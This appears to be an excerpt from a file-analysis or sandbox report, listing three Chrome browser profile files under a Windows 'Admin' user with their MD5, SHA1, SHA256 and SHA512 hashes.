C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | a8bc16aaca1ecc1b68266c0b2d941263 |
| SHA1 | 56ba9a3259253a45af766a20a689f185f0c27311 |
| SHA256 | 1903586a5b3b0a69a603ba8a4d2ce720cc8c4fc226392f4d0c749b45ea7b2504 |
| SHA512 | d976f493d1acff5dc7804afe8a549b9e8f27332c6a6ef945b3783de93f95fd3468ef3895097ac8c6fdb53b4255cb56095a2288a7599139e7445c3e34c901cc43 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b913fe2cf820a2384b5b74ee09ff45f0 |
| SHA1 | dec8db73a30ae56a1119ce38ce2e2ee9619d219c |
| SHA256 | 419a49d6ea0a65a5e7de19e11a68b69d0a5d744ce14d9470e670b1e479058c16 |
| SHA512 | 0ac194b162e3cd40b231494d3a63af2e41262c7930547b708fb41425300158d441fdb2032f5b3b0b1573709fef1a07fe2eaa7061cf029504e5e7188193447790 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | 0fdbe6432e0b06449631e0b24afeefe1 |
| SHA1 | 6aeb5f2c21cb7d6628ee5cbbe2363133421b461a |
| SHA256 | 5bf032905be200c16b494e72b33bd4878332314a1d820bdabef10105ceccfec7 |
| SHA512 | 3204cfbde48888044cf5c635456d07c7636c8aef1c6c742b3a59fca611231ecdb7dddeac7f7b67e090b2230587232ad45018d31d3df7311819d91b544f7c40d8 |